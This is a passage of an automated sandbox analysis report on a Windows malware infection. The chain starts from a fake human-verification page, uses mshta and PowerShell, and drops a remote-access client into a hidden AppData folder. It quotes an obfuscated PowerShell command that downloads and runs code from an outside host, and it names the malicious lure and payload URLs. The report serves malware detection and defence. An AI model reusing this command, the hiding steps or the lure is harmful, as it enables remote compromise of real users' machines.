                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,21_2_110321E0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,21_2_110076F0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,21_2_11113880
                                  Source: Yara matchFile source: 21.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: client32.exe PID: 7368, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLL, type: DROPPED

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Contains functionalty to change the wallpaper
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,21_2_111158B0

                                  System Summary

                                  barindex
                                  Powershell drops PE file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\msvcr100.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11115750: GetModuleFileNameA,GetShortPathNameA,CreateFileA,CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,21_2_11115750
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,21_2_1115DB40
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,21_2_1102D330
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB75C03CF12_2_00007FFEB75C03CF
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB75C0EB212_2_00007FFEB75C0EB2
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB75C11A012_2_00007FFEB75C11A0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB75C018E12_2_00007FFEB75C018E
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110733B021_2_110733B0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1102959021_2_11029590
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11061C9021_2_11061C90
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1103301021_2_11033010
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1116322021_2_11163220
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1102B5F021_2_1102B5F0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1116748521_2_11167485
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110454F021_2_110454F0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1101B76021_2_1101B760
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111258B021_2_111258B0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1101BBA021_2_1101BBA0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11087C6021_2_11087C60
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1116DFCB21_2_1116DFCB
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1107009021_2_11070090
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1108048021_2_11080480
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1115E98021_2_1115E980
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1101C9C021_2_1101C9C0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110088AB21_2_110088AB
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11050D8021_2_11050D80
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: String function: 11146450 appears 589 times
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: String function: 110278E0 appears 47 times
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: String function: 1116F010 appears 36 times
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: String function: 11029450 appears 929 times
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: String function: 111603E3 appears 40 times
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: String function: 1105DD10 appears 288 times
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: String function: 11081BB0 appears 44 times
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: String function: 11164010 appears 32 times
                                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                                  Source: classification engineClassification label: mal100.rans.phis.troj.evad.win@30/39@14/9
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11059C50 GetLastError,FormatMessageA,LocalFree,21_2_11059C50
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,21_2_1109D440
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,21_2_1109D4D0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,21_2_11115B70
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11089150 FindResourceA,LoadResource,LockResource,21_2_11089150
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,21_2_11127E10
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mshhzrqx.05j.ps1Jump to behavior
                                  Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,2740781035066481159,16273883810358689985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                  Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://inspyrehomedesign.com/Ray-verify.html"
                                  Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://inspyrehomedesign.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3293''
                                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\bpsFyf
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\bpsFyf
                                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe "C:\Users\user\AppData\Roaming\bpsFyf\client32.exe"
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1896,i,2740781035066481159,16273883810358689985,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\bpsFyfJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe "C:\Users\user\AppData\Roaming\bpsFyf\client32.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\bpsFyfJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: winmm.dllJump to behavior
